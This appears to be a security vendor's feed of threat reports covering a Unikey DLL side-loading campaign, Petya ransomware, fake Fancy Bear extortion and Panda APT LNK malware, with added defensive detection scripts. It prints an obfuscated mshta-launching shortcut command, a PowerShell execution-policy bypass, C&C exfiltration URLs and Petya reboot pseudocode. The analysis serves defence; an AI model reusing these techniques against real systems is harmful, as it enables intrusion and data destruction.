Beacon payload created by CobaltStrike.
The remaining payload block, numverse_http, is used by Metasploit.
In addition, the C&C of these attacks is often detected in China:

Although there have been recent attacks similar to Sea Lotus actions, there are also behaviours that differ from those of Sea Lotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups in recent years, regularly attacking areas in China and countries around the world. Many cybersecurity companies have consistently published reports about recent Sea Lotus attacks. The group is currently showing no signs of stopping; it is constantly updating its attack technologies and techniques, causing a lot of difficulty for security activities. Therefore, users need to increase security awareness, not execute attachments of unknown emails and not be fooled by phishing messages.

Safety recommendations

  • Raise security awareness: do not open attachments of unknown emails unless the source is reliable and the purpose is clear, and do not enable Office macros lightly.
  • Install operating system patches and patches for important software such as Office in a timely manner.
  • Use antivirus software to prevent possible attacks such as Trojan horses.
  • Users and businesses should deploy an early threat detection system such as a SOC. A SOC is currently the first choice of security teams.

The related IOC

MITRE ATT&CK

Source: mp.weixin.qq.com

RDoS ATTACKS BY FAKE FANCY BEAR
05 Dec

Recently, Threat Intelligence collected some information about ransom denial-of-service (RDoS) attacks, in which the attacker demands a ransom from the victims in exchange for not being attacked.

These attackers extort money by sending threatening emails to the victims. Most of them use the name Fancy Bear, borrowing that group's reputation to frighten the victims. Attackers posing as the infamous Fancy Bear threatened to launch a DDoS attack if the ransom was not paid. In some cases, attackers have carried out small DDoS attacks to prove their capabilities and back up their threats. The attacks have also been confirmed by other security researchers.

During the same period, CMC Cyber Security received support requests from an organization that had received the same threatening email:


Some organizations that received this threat email also saw a demo DDoS attack on their servers.

The attack vector (floods) uses the UDP and ICMP protocols; in particular, the attacker used UDP/3283, a newly discovered attack vector from 06/2019.

Port UDP/3283 is used by the Apple Remote Desktop (ARD) protocol and the ARMS service.

Fancy Bear, also known as APT28 (Sednit group, Sofacy, Pawn Storm, Strontium, Tsar Team, TG-4127, Group-4127, TAG_0700, Swallowtail, Iron Twilight, Group 74), has been operating since 2004 and is a hacker organization that specializes in attacking large organizations and governments with APT campaigns.

We can confirm that the Fancy Bear group has nothing to do with ransom denial-of-service (RDoS) campaigns: its goal is mostly to break in and spy, whereas these extortionists aim to make money from the Fancy Bear name with just a threat and a bit of social engineering.

The source IPs used by the attacker for the UDP flood during the RDoS attack are randomized.

CMC Cyber Security will only publish part of the details; if you want more, please contact us.

There are many methods to mitigate this type of DDoS attack and they are not too difficult to implement. We will continue to update the specific details as soon as possible.

CMC WARNS OF A NEW APT CAMPAIGN EXPLOITING UNIKEY TO ATTACK VIETNAMESE USERS
03 Dec


General information

MD5: 08e71118bad94617bf25a0d42db6a564

Filename: KBDUS.dll

The CMC CMDD monitoring system detected malicious code that took advantage of Unikey software to attack Vietnamese users. Unikey is Vietnamese typing software for Windows that is very popular in Vietnam. Taking advantage of this, an attacker can build a Unikey installer using the official UnikeyNT.exe file but place a malicious file in the same directory, and use many techniques to trick users into running it (exploits, phishing ...). Therefore users should only download the official version of Unikey from the website unikey.org and should not open strange files from strange paths. Also keep Windows vulnerability patches up to date.



Technical analysis

In the case below, the file kbdus.dll (PE 32-bit) containing malicious code was placed in the same directory as UnikeyNT.exe (version 4.0 RC2 Build 091101 NT). The attacker also changed the timestamp attribute of kbdus.dll to match that of UnikeyNT.exe so that the user is more easily deceived. In fact, this file was compiled at the beginning of October 2019.


Kbdus.dll

kbdus.dll is a library that is loaded when the user uses the US keyboard layout (id 0x00000409). The attacker analysed how Unikey works and realized that when UnikeyNT.exe loads its companion DLL, UKhook40.dll, that DLL calls the LoadKeyboardLayoutA function to load the layout with id 0x00000409, which in turn loads kbdus.dll. Because kbdus.dll is placed in the same directory as UnikeyNT.exe, this copy is loaded first, so the malicious code it contains is executed.

In the DLL's DllMain function, the malicious code creates a new thread to carry out its malicious behaviour.

The malware creates a mutex named "Global\mFNXzY0g" to avoid running more than once. Most of the strings it uses are obfuscated, either as stack strings or with its own encoding routine. The encoding routine simply adds 1 to the value of each character (for example, "K", 0x4b, is encoded as 0x4c, "L"). In IDA Pro you can use IDAPython to patch these characters back. For the stack strings, the FLARE team's ironstrings.py script simplifies the analysis.

After creating and checking the mutex, the malicious code reads data from specific registry keys. These keys are most likely created when the user runs an installer prepared by the attacker. The first is the value "CB5JQLWSYQP2CWVRMJ8NB4CCUE1B8K4A" under the key "HKEY_CLASS_ROOT\.kci\PersistenHandler". This value holds an envelope structure followed by XML data. The structure contains a number of values the malware can check after decoding, such as the size of the XML data before and after decoding and its MD5 before and after decoding.

The decoded data is XML, which the malware parses into memory using the APIs of the xmllite.dll library.

The next value read from the key "HKEY_CLASS_ROOT\.kci\PersistenHandler" is "F430D64D98E6EAC972380D568F080E08". It holds another structure that also carries size and MD5 information about the data inside it. Based on this structure, the malicious code decrypts a PE file using the same decryption method and checks it used for the XML data.

This PE file is a DLL named Knocker.dll that exports a function named Construct; its compile time is almost the same as that of the kbdus.dll file above. The malicious code loads the DLL into memory, locates the address of Construct and calls it, passing the address of the previously read XML data structure as the parameter.

Using APIs such as VirtualAlloc, VirtualProtect, LoadLibrary and GetProcAddress, the PE file is mapped into memory like a normally loaded PE file. Before calling Construct, the malicious code also runs the DLL's DllMain so that the DLL works properly.

Knocker.dll - Construct

In Construct, the malicious code copies the data received through the parameter into another memory area, then begins collecting information about the user's computer: CPU, RAM, Windows information, computer name, organisation, user information, language, time zone, network card, drive partition information and the operating system installation.

The malware then generates a UUID under the key "HKEY_CLASS_ROOT\.kci\PersistenHandler" and stores two MD5 values. The first is computed from the user SID, user name and computer name. The second is computed from the CPU, RAM, disk and network adapter values.

The malware then builds a string identifying the machine of the form "PC: %s; MAC: %s; SerVer: %f". This data is placed in a structure that the malicious code base64-encodes and sends using the GET method.

The request sent to the C&C has the form:

"hxxp://news.vnxahoi[.]com:443/4BwhFJ9p/job.php?[UUID][data_in_base64]"

with the user agent:

"Mozilla/4.0 (compatible; MSIE 8.0; Win32)"

and the following headers:

"Content-Length: %d\r\nCache-Control: no-cache\r\nMD5: %s\r\nConnection: Close\r\n"

On the first connection the malicious code waits to receive a command to execute. The second connection is similar to the first but reports the result of executing the command, using the POST method and the format:

"hxxp://news.vnxahoi[.]com:443/4BwhFJ9p/job.php?[UUID][create_process_state]"

This is the final step in the malware's execution. At the time of writing, however, the server responds with 404 Not Found, so the malicious code cannot proceed to its other behaviours.

Information about the C&C

Looking up the C&C domain shows that it points to the IP address 125[.]212.218.121.

Some other domains pointing to this IP are:

Assessing the level of danger

This is a well-researched, very dangerous and hard-to-detect attack campaign. Because Unikey is such a popular input method in Vietnam, it is fair to say that nearly every Windows computer in Vietnam has Unikey installed. An attacker only needs to drop the kbdus.dll file into the Unikey folder to compromise the victim's machine. Users are advised to carefully check the Unikey installation directory and remove any kbdus.dll file found there, or to use anti-malware products to protect their computers. CMC's CMDD has added detection for the malicious kbdus.dll; users can download it at the following link: https://cmccybersecurity.com/cmc-antivirus-free/
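As an added example (not CMC's tool or the article's code), the check recommended above can be scripted: look for a kbdus.dll beside UnikeyNT.exe, compare its MD5 with the hash in this report, and compare the file's modification time (which the attacker copied from UnikeyNT.exe) with the compile timestamp in its PE header. The demo folder and its minimal PE-like kbdus.dll are constructed test data.

```python
"""Hunt for a side-loaded kbdus.dll next to UnikeyNT.exe (added example, not CMC's tool)."""
import hashlib
import os
import struct
import tempfile
from datetime import datetime, timezone

KNOWN_BAD_MD5 = "08e71118bad94617bf25a0d42db6a564"   # MD5 of the sample from this report


def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def pe_compile_time(path: str):
    """Return IMAGE_FILE_HEADER.TimeDateStamp as a UTC datetime, or None if not a PE file."""
    with open(path, "rb") as f:
        data = f.read(4096)
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 12 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    ts = struct.unpack_from("<I", data, e_lfanew + 8)[0]   # TimeDateStamp follows Machine/NumberOfSections
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def check_unikey_dir(directory: str) -> dict:
    """Inspect one directory; returns findings, or an empty dict when nothing suspicious."""
    names = {n.lower(): n for n in os.listdir(directory)}
    if "unikeynt.exe" not in names or "kbdus.dll" not in names:
        return {}
    exe = os.path.join(directory, names["unikeynt.exe"])
    dll = os.path.join(directory, names["kbdus.dll"])
    digest = md5_of(dll)
    exe_mtime, dll_mtime = os.path.getmtime(exe), os.path.getmtime(dll)
    compile_time = pe_compile_time(dll)
    findings = {
        "path": dll,
        "md5": digest,
        "known_bad": digest == KNOWN_BAD_MD5,
        "sideload_candidate": True,   # kbdus.dll belongs in the system directory, not here
        "mtime_matches_exe": abs(exe_mtime - dll_mtime) < 2,   # timestamp copied from UnikeyNT.exe
        "compile_time": compile_time,
    }
    if compile_time is not None:
        # a file "modified" before it was compiled carries a forged timestamp
        findings["mtime_before_compile"] = dll_mtime + 1 < compile_time.timestamp()
    return findings


def make_demo_dir(root: str) -> str:
    """Construct a fake Unikey folder: stub UnikeyNT.exe plus a minimal PE kbdus.dll (test data)."""
    os.makedirs(root, exist_ok=True)
    exe, dll = os.path.join(root, "UnikeyNT.exe"), os.path.join(root, "kbdus.dll")
    with open(exe, "wb") as f:
        f.write(b"MZ" + b"\0" * 62)
    ts = int(datetime(2019, 10, 1, tzinfo=timezone.utc).timestamp())   # compiled October 2019
    coff = struct.pack("<HHIIIHH", 0x14C, 1, ts, 0, 0, 0, 0x2102)       # IMAGE_FILE_HEADER, i386 DLL
    blob = bytearray(b"MZ" + b"\0" * 62)
    blob[0x3C:0x40] = struct.pack("<I", 0x40)                           # e_lfanew -> PE header at 0x40
    blob += b"PE\0\0" + coff
    with open(dll, "wb") as f:
        f.write(blob)
    old = datetime(2006, 1, 1, tzinfo=timezone.utc).timestamp()         # forged, pre-compile mtime
    os.utime(exe, (old, old))
    os.utime(dll, (old, old))
    return root


def demo() -> dict:
    return check_unikey_dir(make_demo_dir(os.path.join(tempfile.mkdtemp(), "Unikey")))


def demo_clean() -> dict:
    return check_unikey_dir(tempfile.mkdtemp())   # no Unikey files at all


if __name__ == "__main__":
    print(demo())
```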

ANALYSIS OF A PETYA RANSOMWARE SAMPLE
08 Nov

Ransomware Petya

Rising from WannaCry's ashes, a new peril emerged: Petya. In 2016 and 2017, the Petya ransomware and its variants affected thousands of computers worldwide. As soon as WannaCry showed signs of subsiding, Petya appeared as its perfect replacement.

The special feature of this malware is that it does not encrypt the user's data files; instead it replaces the Master Boot Record (MBR) and encrypts the Master File Table (MFT), so that the user cannot even boot into the operating system.

How Petya works - Source: Microsoft.com

According to reports, the Petya attack originated from MEDoc, a Ukrainian audit company, through an update of MEDoc's software that contained Petya. Petya was also embedded in document files deliberately sent to organisations; when the user opens one, the ransomware tricks the user into enabling the macros available in Office.

Stage 1: High level

There are many variants of the Petya ransomware in the wild, but in this article we focus on analysing the sample:

SHA-256: 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

It is easy to see that the ransomware sample needs to unpack itself before executing its real code. While debugging the ransomware there are calls to functions such as VirtualProtect and VirtualAlloc that allocate a new memory region and change its protection. The guess is that this region will hold the actual ransomware after unpacking. So we only need to set a breakpoint at the start of the newly created memory, and this is the result:

As can be seen in the picture above, the hex dump window shows the header of a PE file. Dumping the entire region yields a Setup.dll file with a complete, easy-to-read import table.

Let us go through the functions Setup.dll executes in turn when launched. First, Petya retrieves the victim's hard-drive information with DeviceIoControl: the physical location of a volume on the hard drive, and the type, size and volume of the partition (via IOCTL_DISK_GET_PARTITION_INFO_EX and PARTITION_INFORMATION_EX). Here is the pseudocode of the function that obtains the physical location of a volume on one or more hard drives:

  v1 = this;
  BytesReturned = 0;
  v2 = GetSystemDirectoryA(0, 0);
  v3 = v2;
  if ( !v2 )
    return 0;
  v5 = (CHAR *)sub_239090(v2);
  if ( !GetSystemDirectoryA(v5, v3) )
    return 0;
  *(_DWORD *)FileName = 1546542172;
  v9 = *v5;
  v10 = 58;
  sub_239070(v5);
  v6 = CreateFileA(FileName, 0, 3u, 0, 3u, 0, 0);
  if ( v6 == (HANDLE)-1 )
  {
    CloseHandle((HANDLE)0xFFFFFFFF);
    return 0;
  }
  DeviceIoControl(v6, 0x560000u, 0, 0, &OutBuffer, 0x20u, &BytesReturned, 0);
  // 0x560000 is the IoControlCode IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS; later calls use 0x70048 and 0x70000
  // (IOCTL_DISK_GET_PARTITION_INFO_EX, IOCTL_DISK_GET_DRIVE_GEOMETRY) to retrieve the disk information
  CloseHandle(v6);
  qmemcpy(v1, "\\\\.\\PhysicalDrive", 17);
  v1[17] = v12 + 48;
  v1[18] = 0;
  return 1;

The ransomware then creates a buffer containing the ransom links "hxxp://petya5koahtsf7sv[.]onion/[Random]" and "hxxp://petya37h5tbhyvki[.]onion/[Random]" for the ransom note, and calls CryptGenRandom to generate the victim's private key:

  v4 = (_DWORD *)phProv;
  *(_DWORD *)phProv = 0;
  if ( !CryptAcquireContextA(&phProv, 0, 0, 1u, 0xF0000000) )
    return -60;
  if ( !CryptGenRandom(phProv, dwLen, pbBuffer) )
    return -60;
  CryptReleaseContext(phProv, 0);
  *v4 = dwLen;
  return 0;

After the payload has been written, the ransomware uses NtRaiseHardError to force the computer to reboot:

  v0 = GetCurrentProcess();
  if ( !OpenProcessToken(v0, 0x28u, &TokenHandle) )
    return 0;
  LookupPrivilegeValueA(0, "SeShutdownPrivilege", (PLUID)Newstate.Privileges);
  Newstate.PrivilegeCount = 1;
  Newstate.Privileges[0].Attributes = 2;
  AdjustTokenPrivileges(TokenHandle, 0, &Newstate, 0, 0, 0);
  if ( GetLastError() )
    return 0;
  v2 = GetModuleHandleA("NTDLL.DLL");
  v3 = GetProcAddress(v2, "NtRaiseHardError");
  ((void (__cdecl *)(signed int, _DWORD, _DWORD, _DWORD, signed int, char *))v3)(-1073740976, 0, 0, 0, 6, &v5);
  return 1;

Stage 2: Low level

Now we analyse the malicious code written into the MBR of the drive:

From the dump of \\.\PhysicalDrive0 we have:

  • Sector 0: the first-stage bootloader
  • Sectors 1-33: filled entirely with 0x37
  • Sectors 34-49: the ransomware's kernel
  • Sectors 50-53: empty
  • Sector 54: nonce, C&C and personal key
  • Sectors 55-56: encrypted data

When the machine starts, the ransomware code is executed:

To read drive sectors it uses the BIOS interrupt INT 13h.

Next, the ransomware checks whether the MBR has already been encrypted.

If not, Petya uses the Salsa20 algorithm to lock the MFT.

The MFT (Master File Table) is the most important component of an NTFS file system. It contains information about every file and directory on the logical drive.

After encryption completes, the main screen is displayed:

When the user enters the Petya key, it checks the key's format:

  • It has a length of 16 bytes
  • Only the following characters are accepted: 123456789abcdefghijkmnopqrstuvwxABCDEFGHJKLMNPQRSTUVWX

Although it is possible to bypass check_key by patching some of the jumps, that does not decrypt the MFT. However, because of the size limits of the sectors, Petya does not fully implement the Salsa20 algorithm, so the decryption key can be brute-forced.

In Petya's decryption routine we see:

  • Petya loads the 512 bytes of sector 55 (this is the data to be decrypted)
  • Petya loads 8 bytes at offset 0x6c21, right before the C&C data in sector 54 (this is the nonce)

We have the ciphertext and the nonce. You can read up on the Salsa20 algorithm and write a brute-force script yourself, or use the Go tool written by leo-stone.
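As an added example (not the article's code nor leo-stone's tool), here is the verification step of such a brute force in Python: read the nonce from sector 54 and the 512-byte ciphertext from sector 55 at the offsets given above, decrypt with a candidate key and check the result. It uses standard Salsa20/20 with a 16-byte key rather than Petya's cut-down variant, and assumes (for the demo) that the known plaintext is 512 bytes of 0x37, like sectors 1-33, and that the 16 typed characters are used directly as the key; the disk image is constructed.

```python
"""Verify a candidate Petya key against a disk image (added example, standard Salsa20)."""
import struct

SECTOR = 512
NONCE_OFFSET = 0x6C21              # 8-byte nonce inside sector 54 (from the analysis)
VERIFY_SECTOR = 55                 # the 512 bytes Petya decrypts to check the key
KEY_ALPHABET = "123456789abcdefghijkmnopqrstuvwxABCDEFGHJKLMNPQRSTUVWX"
EXPECTED_PLAIN = b"\x37" * SECTOR  # assumed known plaintext for the demo
MASK = 0xFFFFFFFF


def key_format_ok(key: str) -> bool:
    """The two checks Petya performs on the typed key."""
    return len(key) == 16 and all(c in KEY_ALPHABET for c in key)


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _qr(s: list, a: int, b: int, c: int, d: int) -> None:
    s[b] ^= _rotl((s[a] + s[d]) & MASK, 7)
    s[c] ^= _rotl((s[b] + s[a]) & MASK, 9)
    s[d] ^= _rotl((s[c] + s[b]) & MASK, 13)
    s[a] ^= _rotl((s[d] + s[c]) & MASK, 18)


def salsa20_block(key16: bytes, nonce: bytes, counter: int) -> bytes:
    """One 64-byte Salsa20/20 keystream block, 128-bit key form ("expand 16-byte k")."""
    c = struct.unpack("<4I", b"expand 16-byte k")
    k = struct.unpack("<4I", key16)
    n = struct.unpack("<2I", nonce)
    st = [c[0], *k, c[1], *n, counter & MASK, (counter >> 32) & MASK, c[2], *k, c[3]]
    x = st[:]
    for _ in range(10):            # 20 rounds = 10 double rounds (column round, then row round)
        _qr(x, 0, 4, 8, 12); _qr(x, 5, 9, 13, 1); _qr(x, 10, 14, 2, 6); _qr(x, 15, 3, 7, 11)
        _qr(x, 0, 1, 2, 3); _qr(x, 5, 6, 7, 4); _qr(x, 10, 11, 8, 9); _qr(x, 15, 12, 13, 14)
    return struct.pack("<16I", *[(a + b) & MASK for a, b in zip(x, st)])


def salsa20_xor(key16: bytes, nonce: bytes, data: bytes) -> bytes:
    out = bytearray()
    for i in range(0, len(data), 64):
        block = salsa20_block(key16, nonce, i // 64)
        out += bytes(p ^ k for p, k in zip(data[i:i + 64], block))
    return bytes(out)


def try_key(image: bytes, key: str) -> bool:
    """Decrypt the verification sector with `key` and compare with the known plaintext."""
    if not key_format_ok(key):
        return False
    nonce = image[NONCE_OFFSET:NONCE_OFFSET + 8]
    enc = image[VERIFY_SECTOR * SECTOR:(VERIFY_SECTOR + 1) * SECTOR]
    return salsa20_xor(key.encode("ascii"), nonce, enc) == EXPECTED_PLAIN


def brute_force(image: bytes, candidates) -> str:
    """Return the first candidate that verifies, or '' (candidate generation is the caller's job)."""
    return next((k for k in candidates if try_key(image, k)), "")


def make_demo_image(key: str, nonce: bytes) -> bytes:
    """Constructed 57-sector image laid out like the dump described in the article."""
    img = bytearray(57 * SECTOR)
    img[SECTOR:34 * SECTOR] = b"\x37" * (33 * SECTOR)            # sectors 1-33
    img[NONCE_OFFSET:NONCE_OFFSET + 8] = nonce                    # sector 54
    img[VERIFY_SECTOR * SECTOR:(VERIFY_SECTOR + 1) * SECTOR] = \
        salsa20_xor(key.encode("ascii"), nonce, EXPECTED_PLAIN)   # sector 55
    return bytes(img)


if __name__ == "__main__":
    img = make_demo_image("1a2b3c4d5e6f7g8h", b"\x01\x02\x03\x04\x05\x06\x07\x08")
    print(brute_force(img, ["ABCDEFGHJKLMNPQR", "1a2b3c4d5e6f7g8h"]))
```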

Summary

Building a ransomware that runs from the boot sector and encrypts the MBR and MFT is a very interesting direction. However, implementing ransomware below the kernel layer created several weaknesses in the implementation of the encryption algorithm, which let us decrypt without the key. This left the first version of Petya largely harmless. Nevertheless, malware such as Petya and GoldenEye has inspired attackers to develop ransomware that attacks the kernel layer, posing a challenge for the security industry.

WARNING: CRY36/NEMESIS RANSOMWARE IS SPREADING WIDELY
06 Nov

CMC Cyber Security malware analysts have reported that at least 4 organisations have been infected with the Cry36/Nemesis ransomware: all user data (except for files whose encryption would break the operating system) is encrypted and the extension is changed to ".[id]_WECANHELP".

The ransomware sample with the extension ".[id]_WECANHELP" is the latest variant of Cry36/Nemesis, first seen on August 9, 2019. When it infects the victim's computer, it quickly scans all drive partitions and network shares to identify user data, ignoring executable and system files. Finally, the ransomware encrypts the data and, in each folder it encrypts, leaves behind a file containing the victim's ID and information on how the victim can contact the attacker. Cry36/Nemesis variants usually reach the victim's computer through poorly secured RDP ports, spam emails, or by posing as software that tricks users into downloading it.

Currently there is no effective method of decrypting Cry36/Nemesis. However, victims should never pay the attacker's ransom. Many cases have been recorded in which, after paying the ransom, victims still could not decrypt their data or the decrypted data was corrupted. At the same time, paying the attacker only encourages further attacks.

To avoid becoming a victim of Cry36/Nemesis, users should disable the RDP service port when it is not needed, set up firewall rules restricting which users may access the server remotely, and verify the origin of software and emails before opening them.

CMC CYBER SECURITY ANALYSES LNK-BASED MALWARE SAMPLES FROM THE PANDA APT GROUP
31 Oct

Recently, CMC Cyber Security received a number of malicious samples believed to have been developed by the Panda hacker group for APT attacks on government organisations, including Vietnamese ones.

After analysis, the samples can be divided into two types. Each type implements its payload differently, but they share some common characteristics:

  • They use an .lnk shortcut file with a .doc extension in the name (e.g. sample.doc.lnk) to deceive the user.
  • The lnk file has an hta file attached that can execute VBScript.
  • The script opens the attached document for the user and silently executes the payload.

Based on the content of the decoy document files, it can be surmised that the attacker's intended targets are users in some units of the Vietnamese government.

   1. Technical analysis

  1.1. Analysis of file type lnk 1

File LNK

The sample is a shortcut file with the .lnk extension, usually also named with a .doc extension to deceive users, since Windows hides the .lnk extension. The suspicious part is the target of the shortcut. Normally the target of a shortcut points to a folder or file. However, the targets of these samples all contain the following command:

%comspec% /c for %x in (%temp%=%) do for /f "delims==" %i in ('dir "%x\GIAYMOI.doc.lnk" /s /b') do start m%windir:~-1,11%hta.exe "%i"

The command is obfuscated by using the variable %comspec% instead of calling "cmd.exe" directly, and by obtaining the "s" in the file name mshta.exe by cutting the last character from the value of the variable %windir% (usually C:\Windows).
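As an added example (not code from the article), a small expander for cmd.exe variable syntax makes such shortcut targets readable: it resolves %VAR% and the substring form %VAR:~start,len% used here to build "mshta.exe" from %windir%, while leaving for-loop variables such as %x and %i (which have no closing %) untouched. The environment values are assumed defaults, and the sample target is the command quoted above.

```python
"""Expand cmd.exe variable and substring syntax in a shortcut target (added example)."""
import re

# %NAME% or %NAME:~start% or %NAME:~start,len%; NAME must be a plain identifier
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")

# Assumed values of a default Windows environment
DEFAULT_ENV = {
    "comspec": r"C:\Windows\System32\cmd.exe",
    "windir": r"C:\Windows",
    "temp": r"C:\Users\victim\AppData\Local\Temp",
}


def cmd_substring(value: str, start: int, length) -> str:
    """Emulate cmd.exe's %VAR:~start,len% rules (negative start/len count from the end)."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start > n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:                       # negative len: stop that many chars before the end
        end = max(n + length, start)
    else:
        end = min(start + length, n)
    return value[start:end]


def expand_cmd_vars(command: str, env=None) -> str:
    """Replace every %VAR...% reference whose variable is known; keep unknown ones verbatim."""
    env = {k.lower(): v for k, v in (env or DEFAULT_ENV).items()}

    def repl(m):
        name, start, length = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        if start is None:
            return env[name]
        return cmd_substring(env[name], int(start), int(length) if length is not None else None)

    return VAR_RE.sub(repl, command)


# Target command of the analysed .lnk, as quoted in the report
SAMPLE_TARGET = r'''%comspec% /c for %x in (%temp%=%) do for /f "delims==" %i in ('dir "%x\GIAYMOI.doc.lnk" /s /b') do start m%windir:~-1,11%hta.exe "%i"'''


def executable_spawned(command: str) -> str:
    """Return the program name following the final 'start' once variables are expanded."""
    expanded = expand_cmd_vars(command)
    m = re.search(r"\bstart\s+(\S+)", expanded)
    return m.group(1) if m else ""


if __name__ == "__main__":
    print(expand_cmd_vars(SAMPLE_TARGET))
    print("spawns:", executable_spawned(SAMPLE_TARGET))
```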

Mshta.exe is a Microsoft application built to allow quick application development using HTML, CSS, VBScript and JavaScript. Using mshta and the .hta file format, an HTML page can be opened as an application. The hta file format is the same as HTML; by adding the HTA-specific tags to the HTML file we get an hta file that can be opened by the mshta application.

Data can be inserted before the hta file's header. Taking advantage of this, the attacker prepended an lnk file whose target command opens the file itself with mshta.exe, so that the embedded hta is executed. When the user opens the lnk file, Windows runs the command in its target, and mshta.exe opens the lnk file itself.

File HTA

By default, mshta.exe can execute both JavaScript and VBScript embedded in hta files through the related DLLs. When opened, the embedded hta file has the following properties: minimised, not shown on the taskbar, no menu and no caption. Its sole task is to execute the malicious VBScript code.

The VBScript has been obfuscated to make analysis difficult. After deobfuscation, the code can be seen to contain a block of binary data.

The code then uses the ADODB object to save the binary data as a file named 3.ps1 in the %temp% folder.

Finally, it executes 3.ps1 with the command line:

powershell.exe -exec bypass -file & szTempPath, Null, Instance, MWcWurrkfEbtfWdZTY

3.ps1

The PowerShell script is further obfuscated by base64-encoding its entire contents. After decoding, the content is executed through PowerShell's iex (Invoke-Expression) function.

The decoded script is itself obfuscated to make it harder to understand. After analysis, an overview of its contents and tasks is as follows:

  • The script checks whether the current user has Administrator rights and stores the result in a variable.
  • It base64-decodes the .doc file, saves it to the %temp% directory and then opens it for the user.
  • If the script runs with Administrator privileges, the .dat file is saved in the "%windir%\debug" directory; otherwise it is saved in the %temp% folder.
  • The InstallUtil tool (v2.0 or v4.0) is used as a loader to execute the .dat payload file. With Administrator rights, the script copies the two Windows files InstallUtil.exe and schtasks.exe into the %temp% folder; schtasks.exe (the Microsoft utility for scheduling programs and tasks to run automatically) is renamed "wtask.exe".
  • It then uses cmd to run wtask.exe, so that the loader executes the .dat file with SYSTEM privileges.
  • Without Administrator rights, the loader is executed indirectly through VBScript. The script also checks for an installed antivirus product and adjusts how it executes accordingly.
  • Once executed, the "wtask.exe" process creates an entry in Task Scheduler to execute.
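As an added example (not part of the report), the chain described above can be matched in process-creation telemetry: mshta.exe handed a .lnk path, PowerShell with -exec bypass running a script from %temp%, InstallUtil.exe running outside the .NET framework directory, and schtasks.exe renamed to wtask.exe (its OriginalFileName no longer matches the on-disk name). The key=value log format and the five events are constructed to mirror Sysmon Event ID 1 fields; they are not real telemetry.

```python
"""Flag process-creation events matching the LNK -> mshta -> PowerShell -> InstallUtil chain (added example)."""
import re

# matches "...\AppData\Local\Temp\..." or "...\Temp\..." in a command line
TEMP_RE = re.compile(r"\\(?:appdata\\local\\temp|temp)\\", re.I)


def parse_event(line: str) -> dict:
    """Parse a constructed 'Key=Value|Key=Value' line into a dict."""
    fields = {}
    for part in line.split("|"):
        k, _, v = part.partition("=")
        fields[k.strip()] = v.strip()
    return fields


def detect(ev: dict) -> list:
    """Return the names of every rule the event triggers."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    parent = ev.get("ParentImage", "").lower()
    orig = ev.get("OriginalFileName", "").lower()
    hits = []
    # 1. mshta.exe asked to open a .lnk file (the shortcut executes itself as an HTA)
    if image.endswith("\\mshta.exe") and ".lnk" in cmd:
        hits.append("mshta_opening_lnk")
    # 2. PowerShell with the execution policy bypassed, running a .ps1 dropped in %temp%
    if image.endswith("\\powershell.exe") and "-exec bypass" in cmd and TEMP_RE.search(cmd) and ".ps1" in cmd:
        hits.append("powershell_bypass_temp_script")
    # 3. InstallUtil.exe copied out of the .NET framework directory and used as a loader
    if orig == "installutil.exe" and "microsoft.net\\framework" not in image:
        hits.append("installutil_outside_framework_dir")
    # 4. schtasks.exe renamed (wtask.exe): the PE's OriginalFileName disagrees with the file name
    if orig == "schtasks.exe" and not image.endswith("\\schtasks.exe"):
        hits.append("renamed_schtasks")
    # 5. any of the above spawned from the script host stage
    if hits and (parent.endswith("\\mshta.exe") or parent.endswith("\\wscript.exe")):
        hits.append("scripted_parent")
    return hits


# Constructed sample events, not real telemetry
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Users\victim\Desktop\GIAYMOI.doc.lnk|ParentImage=C:\Windows\System32\cmd.exe|OriginalFileName=MSHTA.EXE",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -exec bypass -file C:\Users\victim\AppData\Local\Temp\3.ps1|ParentImage=C:\Windows\System32\mshta.exe|OriginalFileName=PowerShell.EXE",
    r"Image=C:\Users\victim\AppData\Local\Temp\wtask.exe|CommandLine=wtask.exe /create /tn update|ParentImage=C:\Windows\System32\cmd.exe|OriginalFileName=schtasks.exe",
    r"Image=C:\Users\victim\AppData\Local\Temp\InstallUtil.exe|CommandLine=InstallUtil.exe C:\Users\victim\AppData\Local\Temp\tmp_FlVnNI.dat|ParentImage=C:\Users\victim\AppData\Local\Temp\wtask.exe|OriginalFileName=InstallUtil.exe",
    r"Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks.exe /query|ParentImage=C:\Windows\explorer.exe|OriginalFileName=schtasks.exe",
]


def scan(lines) -> dict:
    """Return {line_index: [rule names]} for every line that triggered at least one rule."""
    results = {}
    for i, line in enumerate(lines):
        hits = detect(parse_event(line))
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```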

Final Payload

When InstallUtil.exe loads the payload file tmp_FlVnNI.dat, it decodes a base64-encoded shellcode, copies the decoded bytes into memory allocated with PAGE_EXECUTE_READWRITE protection, and creates a thread to execute the shellcode.

The shellcode decodes part of its own code with XOR using the key 0x44. After decoding 0xcf2 bytes, it executes the decoded part.

This is the final payload, which connects to the attacker's server. At present the server cannot be reached.

  1.2. Analysis of lnk file type 2

First stage

Like type 1, type 2 is also an lnk file prepended to an hta file. When the VBScript runs, it decodes and stores in the %temp% folder three base64-encoded binaries and one document file.

The document file will then be opened for the user.

Meanwhile, the script executes the file 3.exe to carry out the malicious actions.

Second stage

The executable 3.exe is in fact a clean file, but it loads a modified DLL containing malicious code.

